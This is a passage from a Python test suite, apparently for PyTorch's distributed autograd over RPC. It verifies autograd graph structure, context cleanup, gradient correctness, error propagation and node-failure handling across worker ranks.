# t3.rpcRecvBackward
#
def _verify_graph_for_first_rpc_call(
self, send_function, recv_function, t1, t2, ret
):
# Retrieve the next functions in the graph.
next_funcs = send_function.next_functions
self.assertEqual(2, len(next_funcs))
# We should now hit t1 and t2 in the autograd graph.
self.assertEqual("torch::autograd::AccumulateGrad", next_funcs[0][0].name())
self.assertEqual(t1, next_funcs[0][0].variable)
self.assertEqual(0, next_funcs[0][1])
self.assertEqual("torch::autograd::AccumulateGrad", next_funcs[1][0].name())
self.assertEqual(t2, next_funcs[1][0].variable)
self.assertEqual(0, next_funcs[1][1])
# Test recv functions.
self.assertEqual(ret.grad_fn, recv_function)
# For a context passed from previous nested chain calls, this rank
# receives two tensors t1 and t2, executes torch.add(t1, t2) and sends
# result tensor t3 back.
# For this context in this rank, it expects graph like this:
# send and recv functions:
# rpcSendBackward
# |
# t3.AddBackward0
# / \
# t1.recvRpcBackward t2.recvRpcBackward
def _verify_graph_for_rpc_call_exec(self, send_function):
# Verify next function is AddBackward0
next_funcs = send_function.next_functions
self.assertEqual(1, len(next_funcs))
add_backward_fn = next_funcs[0][0]
self.assertEqual("AddBackward0", add_backward_fn.name())
# Verify the next two functions are the same recv backward function.
next_funcs = add_backward_fn.next_functions
self.assertEqual(2, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[1][0].name()
)
self.assertEqual(next_funcs[0][0], next_funcs[1][0])
# For a context passed from previous nested chain calls, this rank
# receives two tensors t1 and t2, forwards t1 and t2 tensors using
# nested rpc call to next dst. In return route, receive result tensor t3
# from next dst and forwarding t3 back to previous calls.
# For this context in this rank, it expects graph like this:
# send and recv functions for receiving and forwarding t1 and t2:
# rpcSendBackward
# / \
# t1.recvRpcBackward t2.recvRpcBackward
# send and recv functions for receiving and forwarding t3:
# rpcSendBackward
# |
# t3.recvRpcBackward
def _verify_graph_for_nested_rpc_call(self, ctx):
send_functions = ctx._send_functions()
self.assertEqual(2, len(send_functions))
# For send function when making nest rpc call,
# next functions of the send function are two recv functions
# for received two tensors from previous call
next_funcs = list(send_functions.values())[0].next_functions
self.assertEqual(2, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[1][0].name()
)
self.assertEqual(next_funcs[0][0], next_funcs[1][0])
# For send function when returning resonpose to previous call
# next function of the send function is the recv function
# for received tensor result returned from nested call
next_funcs = list(send_functions.values())[1].next_functions
self.assertEqual(1, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
def _test_graph(self, fn, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(worker_name(dst_rank), fn, args=(t1, t2))
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), fn, args=(t1, t2)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# Verify graph for current context id.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(1, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[0],
t1,
t2,
ret,
)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
# Verify graph for previous context id.
ctx = dist_autograd._retrieve_context(ctx_ids[1])
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[0])
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
# autograd context should be cleaned up by now.
with self.assertRaises(RuntimeError):
ctx = dist_autograd._retrieve_context(context_id)
# No autograd context available.
with self.assertRaises(RuntimeError):
ctx = dist_autograd._current_context()
@dist_init
def test_graph_for_builtin_call(self):
self._test_graph(torch.add, ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_python_call(self):
self._test_graph(my_py_add, ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_builtin_remote_call(self):
self._test_graph(torch.add, ExecMode.REMOTE)
@dist_init
def test_graph_for_python_remote_call(self):
self._test_graph(my_py_add, ExecMode.REMOTE)
# 3-layer nested calls
def _test_graph_for_py_nested_call(self, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
nest_dst_rank = (dst_rank + 1) % self.world_size
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_py_nested_call,
args=(t1, t2, dst_rank, self.world_size, 1),
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank),
my_py_nested_call,
args=(t1, t2, dst_rank, self.world_size, 1),
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
# Barrier to ensure all RPCs are done.
dist.barrier()
for rd in [1, 2, 3]:
rpc.rpc_sync(
worker_name((self.rank + rd) % self.world_size),
_set_rpc_done,
args=(context_id, rd),
)
# Barrier to ensure all set_rpc_done have completed.
dist.barrier()
# For self.rank, it has 4 graphs to verify
# One is for current context id when this rank send first rpc call.
# Second one is for prev context id when this rank make 1st nested
# call.
# Third one is for prev prev context id when this rank make
# 2nd nested call.
# Last one is for prev prev prev context id when this rank
# execute the torch.add() operator.
# Verify first graph for current context id.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(1, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[0],
t1,
t2,
ret,
)
# Verify second graph for 1st nested call.
ctx = dist_autograd._retrieve_context(ctx_ids[1])
self._verify_graph_for_nested_rpc_call(ctx)
# Verify third graph for 2nd nested call.
ctx = dist_autograd._retrieve_context(ctx_ids[2])
self._verify_graph_for_nested_rpc_call(ctx)
# verify last graph for rpc call execution.
ctx = dist_autograd._retrieve_context(ctx_ids[3])
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[0])
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
@dist_init
def test_graph_for_py_nested_call(self):
self._test_graph_for_py_nested_call(ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_py_nested_remote_call(self):
self._test_graph_for_py_nested_call(ExecMode.REMOTE)
# Rank0->Rank1->Rank0
def _test_graph_for_py_nested_call_itself(self, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_py_nested_call,
args=(
t1,
t2,
(self.rank - 1 + self.world_size) % self.world_size,
self.world_size,
0,
),
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank),
my_py_nested_call,
args=(
t1,
t2,
(self.rank - 1 + self.world_size) % self.world_size,
self.world_size,
0,
),
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name((self.rank + 1) % self.world_size),
_set_rpc_done,
args=(context_id, 1),
)
# For self.rank, it has 2 graphs to verify.
# One is for current context id when this rank send first rpc
# call and execute the torch.add() operator.
# Another one is for prev context id when this rank make
# nested call.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(2, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(2, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[1],
t1,
t2,
ret,
)
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[1])
# Verify two pairs of send and recv functions for nested
# call
self._check_rpc_done(1)
ctx = dist_autograd._retrieve_context(ctx_ids[1])
self._verify_graph_for_nested_rpc_call(ctx)
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
@dist_init
def test_graph_for_py_nested_call_itself(self):
self._test_graph_for_py_nested_call_itself(ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_py_nested_remote_call_itself(self):
self._test_graph_for_py_nested_call_itself(ExecMode.REMOTE)
def _test_no_graph_with_tensors_not_require_grad(self, exec_mode):
initialize_pg(self.file_init_method, self.rank, self.world_size)
dst_rank = (self.rank + 1) % self.world_size
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=False)
t2 = torch.zeros(3, 3, requires_grad=False)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(t1, t2)
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), torch.add, args=(t1, t2)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
ctx = dist_autograd._current_context()
send_functions = ctx._send_functions()
self.assertEqual(len(send_functions), 0)
recv_functions = ctx._recv_functions()
self.assertEqual(len(recv_functions), 0)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
# NB: RRef.to_here() always passes the autograd context to the
# the callee, as the caller does not know whether the return
# value would contain a requires_grad tensor or not.
#
# rpc/remote with udf (_set_rpc_done here) also always passes the
# autograd context to the callee due to the same reason.
self.assertNotEqual(-1, dist_autograd._retrieve_context(ctx_ids[1]))
dist.barrier()
@dist_init
def test_no_graph_with_tensors_not_require_grad(self):
self._test_no_graph_with_tensors_not_require_grad(ExecMode.RPC_SYNC)
@dist_init
def test_no_graph_with_tensors_not_require_grad_remote(self):
self._test_no_graph_with_tensors_not_require_grad(ExecMode.REMOTE)
def _test_grad_only_on_return_value(self, exec_mode):
initialize_pg(self.file_init_method, self.rank, self.world_size)
dst_rank = (self.rank + 1) % self.world_size
with dist_autograd.context() as context_id:
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(worker_name(dst_rank), ret_requires_grad)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), ret_requires_grad
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
dist_autograd.backward(context_id, [ret.sum()])
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
grads = dist_autograd.get_gradients(ctx_ids[1])
self.assertEqual(1, len(grads))
self.assertIn(requires_grad_tensor, grads)
self.assertEqual(torch.ones_like(ret), grads[requires_grad_tensor])
# due to the above get_gradients call, ensure that dist autograd
# contexts aren't cleaned up until all workers exit context managers
dist.barrier()
@dist_init
def test_grad_only_on_return_value(self):
self._test_grad_only_on_return_value(ExecMode.RPC_SYNC)
@dist_init
def test_grad_only_on_return_value_remote(self):
self._test_grad_only_on_return_value(ExecMode.REMOTE)
def _test_rpc_complex_args(self, exec_mode):
with dist_autograd.context() as context_id:
num_tensors = 10
tensors = []
for i in range(num_tensors):
tensors.append(torch.ones(3, 3, requires_grad=(i % 2 == 0)))
dst_rank = self._next_rank()
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.stack, args=(tensors,)
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), torch.stack, args=(tensors,)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
self.assertEqual(torch.stack(tensors), ret)
# Verify appropriate tensors have been attached the autograd graph.
next_funcs = list(
dist_autograd._current_context()._send_functions().values()
)[0].next_functions
idx = 0
for i in range(len(next_funcs)):
self.assertEqual(
"torch::autograd::AccumulateGrad", next_funcs[i][0].name()
)
self.assertEqual(tensors[i], next_funcs[i][0].variable)
# Verify that the worker id has been recorded in the context
ctx = dist_autograd._current_context()
worker_ids = ctx._known_worker_ids()
self.assertEqual(len(worker_ids), 1)
self.assertEqual(worker_ids, {dst_rank})
@dist_init
def test_rpc_complex_args(self):
self._test_rpc_complex_args(ExecMode.RPC_SYNC)
@dist_init
def test_remote_complex_args(self):
self._test_rpc_complex_args(ExecMode.REMOTE)
def context_cleanup_test_helper(self, rpc_args, func, nested=False):
initialize_pg(self.file_init_method, self.rank, self.world_size)
# test that in dist autograd, in the case that tensors communicated over RPC do
# NOT require grad, we still cleanup the dist autograd contexts created
# on other nodes. This is because the autograd context is still
# communicated over RPC even if tensor arguments do not require grad, as
# it is possible that the response could.
if nested:
dst_rank = (self.rank + 1) % self.world_size
nested_dst_rank = (dst_rank + 1) % self.world_size
dst_ranks = {dst_rank}
else:
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), func, args=rpc_args)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
if nested:
rpc.rpc_sync(
worker_name(nested_dst_rank),
_set_rpc_done,
args=(context_id, 2),
)
# the thread's context id should be cleaned up
with self.assertRaises(RuntimeError):
dist_autograd._retrieve_context(context_id)
# Ensure all peers have finished mutating the
# `known_context_ids` set.
dist.barrier()
# check that all contexts have been cleaned up.
success = _all_contexts_cleaned_up()
self.assertTrue(success)
@dist_init
def test_context_cleanup_tensor_with_grad(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
self.context_cleanup_test_helper(rpc_args=(t1, t2), func=torch.add)
@dist_init
def test_context_cleanup_tensor_no_grad(self):
t1 = torch.ones(3, 3, requires_grad=False)
self.context_cleanup_test_helper(rpc_args=(t1, t1), func=torch.add)
@dist_init
def test_context_cleanup_no_tensors(self):
self.context_cleanup_test_helper(rpc_args=(1, 1), func=my_scalar_add)
@dist_init
def test_context_cleanup_nested_rpc(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
dst_rank = (self.rank + 1) % self.world_size
args = (t1, t2, dst_rank, self.world_size, 0)
self.context_cleanup_test_helper(
rpc_args=args, func=my_py_nested_call, nested=True
)
@dist_init
def test_worker_ids_recorded(self):
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
# if no tensors require grad, we should still record worker_ids, as
# the autograd context ID is still passed to other workers.
t1 = torch.ones(3, 3, requires_grad=False)
t2 = torch.zeros(3, 3, requires_grad=False)
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), torch.add, args=(t1, t2))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# all worker_ids in dst_ranks should be recorded.
ctx = dist_autograd._current_context()
worker_ids = ctx._known_worker_ids()
self.assertEqual(worker_ids, dst_ranks)
# worker_ids should be recorded when tensors do require grad
t1.requires_grad = True
t2.requires_grad = True
for dst_rank in dst_ranks:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(t1, t2)
)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# all worker_ids in dst_ranks should be recorded.
worker_ids = ctx._known_worker_ids()
self.assertEqual(worker_ids, dst_ranks)
@dist_init
def test_dist_autograd_profiling(self):
with dist_autograd.context() as context_id:
t1 = torch.rand(3, 3, requires_grad=True)
t2 = torch.rand(3, 3, requires_grad=True)
loss = rpc.rpc_sync(worker_name(self._next_rank()), torch.add, args=(t1, t2)).sum()
with torch.autograd.profiler.profile() as p:
dist_autograd.backward(context_id, [loss])
function_events = p.function_events
def get_event(partial_key):
return [event for event in function_events if partial_key in event.name][0]
send_event = get_event("SendRpcBackward")
recv_event = get_event("RecvRpcBackward")
backward_event = get_event("torch::distributed::autograd::backward")
# There should be at least 1 send and recv_events each, corresponding to send/recv functions executed.
self.assertEqual(send_event.count, 1)
self.assertEqual(recv_event.count, 1)
# The CPU total for backward event should be great than send and recv, since
# applying those functions in the backwards pass is a subset of the entire backward pass.
self.assertGreater(backward_event.cpu_time_total, send_event.cpu_time_total)
self.assertGreater(backward_event.cpu_time_total, recv_event.cpu_time_total)
@dist_init
def test_error_in_context(self):
with dist_autograd.context() as context_id:
t1 = torch.rand(3, 3, requires_grad=True)
t2 = torch.rand(6, 6, requires_grad=True)
with self.assertRaises(RuntimeError):
# This should throw an error since matrix sizes don't match.
rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(t1, t2)
)
@dist_init
def test_backward_no_grad_on_tensor(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
torch.add,
args=(t1, t2)).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
self.assertIsNone(t1.grad)
self.assertIsNone(t2.grad)
# Now populate .grad with local autograd engine and
# verify dist autograd doesn't mess with it.
loss_local = torch.add(t1, t2).sum()
loss_local.backward()
self.assertIsNotNone(t1.grad)
self.assertIsNotNone(t2.grad)
t1_grad_before = t1.grad
t2_grad_before = t2.grad
dist_autograd.backward(context_id, [loss])
self.assertEqual(t1_grad_before, t1.grad)
self.assertEqual(t2_grad_before, t2.grad)
def _test_backward_simple(self, dst):
# Run the same code locally and with dist autograd and verify gradients
# are same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func_with_dst(
dst, exec_mode, torch.add, t1, t2
)
loss = ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_simple(self):
self._test_backward_simple(self._next_rank())
@dist_init
def test_backward_simple_self(self):
self._test_backward_simple(self.rank)
# The current rank first creates a tensor on the rref_owner, and then passes
# the rref with another tensor to the callee to run either my_rref_add or
# my_nested_rref_add, depending on whether the callee is the rref owner.
# The grad of tensor lives on the current rank, and the grad of the rref
# tensor lives on the rref owner.
def _test_backward_rref(self, callee, rref_owner):
local_grads = None
t1 = torch.ones((3, 3), requires_grad=True)
t2 = torch.zeros((3, 3), requires_grad=True)
local_ret = torch.add(t1, t2)
local_ret.sum().backward()
with dist_autograd.context() as context_id:
rref_t1 = rpc.remote(
rref_owner, _torch_ones, args=((3, 3),), kwargs={"requires_grad": True}
)
if callee == rref_owner:
rref = rpc.remote(callee, my_rref_add, args=(rref_t1, t2))
else:
rref = rpc.remote(
callee, my_nested_rref_add, args=(rref_owner, rref_t1, t2)
)
ret = rref.to_here()
dist_autograd.backward(context_id, [ret.sum()])
# verify grads on caller
grads = dist_autograd.get_gradients(context_id)
self.assertIn(t2, grads)
self.assertEqual(grads[t2], t2.grad)
# verify grads on rref owner
self.assertTrue(
rpc.rpc_sync(
rref_owner,
_compare_owner_value,
args=(context_id, rref_t1, t1.grad),
)
)
@dist_init
def test_backward_rref(self):
callee = worker_name(self._next_rank())
rref_owner = callee
self._test_backward_rref(callee, rref_owner)
@dist_init
def test_backward_rref_multi(self):
if self.rank > 0:
callee = "worker0"
rref_owner = callee
self._test_backward_rref(callee, rref_owner)
@dist_init
def test_backward_rref_nested(self):
callee = worker_name((self.rank + 1) % self.world_size)
rref_owner = worker_name((self.rank + 2) % self.world_size)
self._test_backward_rref(callee, rref_owner)
# In this test, every rank will serve as a parameter server (ps) and a
# driver, and then kicks off trainers on the other three ranks. So, we have:
# ps = rank0 with trainers = rank1/2/3
# ps = rank2 with trainers = rank2/3/0
# ps = rank3 with trainers = rank3/0/1
# ps = rank4 with trainers = rank0/1/2
#
# These four test ps-trainer groups run on completely separate autograd
# graphs, but they share the same set of underlying RpcAgents.
def _test_trainer_ps(self, create_ref_fn, trainer_fn):
local_grads = None
t1 = torch.ones((3, 3), requires_grad=True)
t2 = torch.zeros((3, 3), requires_grad=True)
local_ret = torch.add(t1, t2)
local_ret.sum().backward()
# create rref on self
rref_t1 = rpc.remote(
worker_name(self.rank),
create_ref_fn,
args=())
# kick off forward and backward pass on three other workers (trainers)
rank_diffs = [1, 2, 3]
futures = []
for rank_diff in rank_diffs:
futures.append(
rpc.rpc_async(
worker_name((self.rank + rank_diff) % self.world_size),
trainer_fn,
args=(rref_t1, t2, worker_name(self.rank), rank_diff),
)
)
# check if the trainers have done with their backward pass
for rank_diff in rank_diffs:
self._check_rpc_done(rank_diff)
# trainers are done and holding the context for verification
accumulate_grad_func = None
for rank_diff in rank_diffs:
# make sure grads are accumulated for the same tensors and values
# are all correct
ctx_id = ctx_ids[rank_diff]
grads = dist_autograd.get_gradients(ctx_id)
local_t1 = rref_t1.to_here()
self.assertIn(local_t1, grads)
self.assertEqual(grads[local_t1], t1.grad)
# unblock trainers
_set_rpc_done(None, 0)
# wait until all trainers are done
torch.futures.wait_all(futures)
@dist_init
def test_trainer_ps(self):
self._test_trainer_ps(create_tensor, _run_trainer)
@dist_init
def test_trainer_ps_torchscript_functions(self):
# TODO, need more investigation
# there is rref leak when shutting down, suspect it is because
# ref as arg is passed to pybind boundary, and the ref is not garbage
# collected by python when calling shutdown()
import torch.distributed.rpc.api as api
api._ignore_rref_leak = True
self._test_trainer_ps(create_torchscript_tensor, _run_trainer_torchscript)
@dist_init
def test_backward_multiple_round_trips(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3))
t3 = torch.rand((3, 3), requires_grad=True)
t4 = torch.rand((3, 3))
t5 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
# Multiple RPCs between different nodes.
val = self._exec_func(exec_mode, torch.add, t1, t2)
val = self._exec_func(exec_mode, torch.mul, t3, val)
s1 = self._exec_func(exec_mode, torch.stack, (t4, val))
s2 = self._exec_func(exec_mode, torch.stack, (t5, val))
val = self._exec_func(exec_mode, torch.bmm, s1, s2)
val = self._exec_func(exec_mode, torch.matmul, val, val)
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t3, t4, t5
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_different_tensor_dims(self):
local_grads = None
t1 = torch.rand((4, 6), requires_grad=True)
t2 = torch.rand((6, 5))
t3 = torch.rand((5, 7), requires_grad=True)
t4 = torch.rand((7, 9))
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
val = self._exec_func(exec_mode, torch.matmul, t1, t2)
val = self._exec_func(exec_mode, torch.linalg.multi_dot, (val, t3, t4))
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t2, t3, t4
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_unused_tensors(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
s = self._exec_func(exec_mode, torch.stack, (t1, t2, t3))
val = self._exec_func(
exec_mode,
torch.matmul,
torch.narrow(s, 0, 0, 1),
torch.narrow(s, 0, 2, 1),
)
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t3
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_multiple_output_tensors(self):
local_grads = None
t = torch.rand((10, 2), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
tensor_list = self._exec_func(exec_mode, torch.split, t, 2)
t1 = tensor_list[0]
t2 = tensor_list[2]
t3 = tensor_list[4]
val = self._exec_func(exec_mode, torch.linalg.multi_dot, (t1, t2, t3))
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t
)
local_grads = ret if ret else local_grads
def _run_test_backward_unused_send_function_in_thread(self):
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
# We don't use the result of an RPC function, as a result the
# backward pass would hang in the "FAST" mode.
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
val = torch.mul(t1, t2)
# Run backward, this would hang forever.
dist_autograd.backward(context_id, [val.sum()])
@dist_init
def test_backward_unused_send_function(self):
# Run the test in a thread which would never finish.
t = threading.Thread(
target=self._run_test_backward_unused_send_function_in_thread
)
t.daemon = True
t.start()
t.join(10) # Wait for 10s.
# Verify thread is still alive (indicating backward hasn't completed yet).
self.assertTrue(t.is_alive())
@dist_init
def test_backward_autograd_engine_error(self):
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
# Perform some ops before error simulation.
tmp = (t1 + t2) * (t1 + t2)
t3 = SimulateBackwardError.apply(tmp)
# Run multiple round trips across different nodes and verify the
# original node receives an error thrown on a node deep in the chain.
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t2, t3)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.mul, args=(val, t2)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(val, t2)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.div, args=(val, t2)
)
with self.assertRaisesRegex(
RuntimeError, "Error on Node [0-9]+: Simulate error on backward pass"
):
# Run backwards, and validate we receive an error.
dist_autograd.backward(context_id, [val.sum()])
@dist_init(clean_shutdown=False)
@sandcastle_skip_if(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_backward_node_failure(self):
rpc._set_rpc_timeout(5) # 5 seconds
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
# Wait for all RPCs to be done.
dist.barrier()
# Kill all odd rank nodes.
if self.rank % 2 == 0:
shutdown_error_regex = self.get_shutdown_error_regex()
# Wait for all other nodes to die.
for rank in range(self.world_size):
if rank % 2 != 0:
wait_until_node_failure(rank, shutdown_error_regex)
# Shutdown sequence is not very well defined and as a result
# we might see any error given by get_shutdown_error_regex()
with self.assertRaisesRegex(RuntimeError, shutdown_error_regex):
# Run backwards, and validate we receive an error since all
# other nodes are dead.
dist_autograd.backward(context_id, [res.sum()])
else:
# Exit all other nodes.
pass
@dist_init
def test_backward_without_context(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
context_id = 100 # dummy context_id
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
dist_autograd.backward(context_id, [res.sum()])
@dist_init
def test_backward_without_rpc(self):
dst_rank = self.rank
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = torch.add(t1, t2)
dist_autograd.backward(context_id, [t3.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertIn(t1, grads)
self.assertIn(t2, grads)
self.assertEqual(torch.ones(3, 3), grads[t1])
self.assertEqual(torch.ones(3, 3), grads[t2])
@dist_init
def test_backward_invalid_args(self):
with dist_autograd.context() as context_id:
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
dist_autograd.backward(context_id, None)
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
dist_autograd.backward(None, None)
with self.assertRaisesRegex(
RuntimeError, "No tensors provided for gradient computation"
):
dist_autograd.backward(context_id, [])
with self.assertRaisesRegex(RuntimeError, "requires_grad not set on"):
t = torch.rand(3, 3)
dist_autograd.backward(context_id, [t])
with self.assertRaisesRegex(
RuntimeError, "is not a scalar, all roots need to be scalar"
):
t = torch.rand(3, 3, requires_grad=True)
dist_autograd.backward(context_id, [t])
with self.assertRaisesRegex(
RuntimeError, "does not have a valid gradient function"
):
t = torch.rand(1, requires_grad=True)
dist_autograd.backward(context_id, [t])
@dist_init
def test_backward_multiple_roots(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
with dist_autograd.context() as context_id:
r1 = self._exec_func(exec_mode, torch.add, t1, t2).sum()
r2 = self._exec_func(exec_mode, torch.mul, t1, t2).sum()
r3 = self._exec_func(exec_mode, torch.cos, t1).sum()
